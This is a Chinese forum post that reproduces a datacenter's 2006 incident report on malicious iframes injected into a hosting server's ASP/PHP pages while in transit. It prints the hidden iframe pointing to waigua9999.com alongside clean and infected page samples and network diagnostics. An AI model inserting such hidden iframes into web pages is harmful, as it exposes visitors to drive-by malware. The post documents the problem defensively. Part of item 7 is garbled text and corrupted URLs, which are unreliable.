这是机房给我发的,呵呵,今晚把机房值班搞的忙的够戗,发给我看看，我看后对这为老兄能如此分析真的感觉我太落伍了,无话可说,看来机房服务还真不好做,还有2个CAP的文件,这个是文本文件直接复制出来给大家看看

从 2006-12-26下午 4:00 左右开始, 我们发现211.155.231.163 服务器上很多网站的动态脚本会被劫持.被附加上一段代码.  代码如下 <iframe src=http://waigua9999.com/index.htm width=0 height=0></iframe>/>
这种情况发生在 asp,php 动态脚本文件.而 html静态文件不会出现这个情况

经过排查, 我们服务器211.155.231.163正常. 并没有入侵等情况

http://108test.h108.72dns.com/2.asp
文件很简单
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title></title>
</head>

<body>
木马测试
</body>
</html>
相应的数据包 在 server网卡数据.cap文件中.

用户端收到的文件有时候正常.有时候会被植入一段木马脚本. 相应的数据包 在 佛山本地网卡数据.cap
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><iframe src=http://waigua9999.com/index.htm width=0 height=0></iframe>/>
<title></title>
</head>
<body>
木马测试
</body>
</html>

我们经过测试发现
1. 如果是在同一个网段 (本机和 211.155.231.145) 访问 ,这个只是走我们内部的交换机, 正常, 没有被植入木马脚本的情况.
2. 如果是在机房内其他网段  211.155.224.184 这个机访问, 有时候 会出现被植入木马脚本的情况.
3. 世导机房晚上值班人员访问时   也出现过 被植入木马脚本的情况.
4. 各地用户访问(全国)       出现过 被植入木马脚本的情况.
5. 目前只有 211.155.231.163 上面的网站出现这个情况,其他服务器还没有用户反映这个问题.
6. 211.155.224.184/192.168.10.105 这个服务器 和 211.155.231.163/192.168.10.108 服务器 我们设置成内部IP,通过内部IP访问时就不会出现被植入木马脚本.
也就是说数据包没有出sv2134交换机就会正常
7. 部分冺玱问袘缑站<` hrdf="http;//wvw.sxun.bn/1.asp" target<"_blank#>htup://www.sxuo.cn/1.arp
=a href=#httq://vww.ikqy/cn/`bouu.asp" _fcksavedurl="#httq://vww.ikqy/cn/`bouu.asp"" t`rget="_blank">hutp:./www.hkqy.co/about.`sp<.a>http://www.deroy.com.cn/About.Asp
http://www.yaou-tie.com/gsjj.htm
8. 我们发现 木马脚本被植入的位置 都是出现在 <title></title>  这中间.


我们判定 当这个服务器的数据包没有走出  sv2134(这个是我司自带的交换机) 这个交换机的时候 是正常的.
当数据包 走出了 交换机. 就会有时被附加木马脚本.
所以我们怀疑 是否是机房 某一个网关出现问题? 还是机房内有其他服务器对我们服务器造成了影响

另外 我们这台服务器自从10月以来
先后三次出现 电信IP被其他服务器绑定. 造成我们服务器外部无法访问的情况.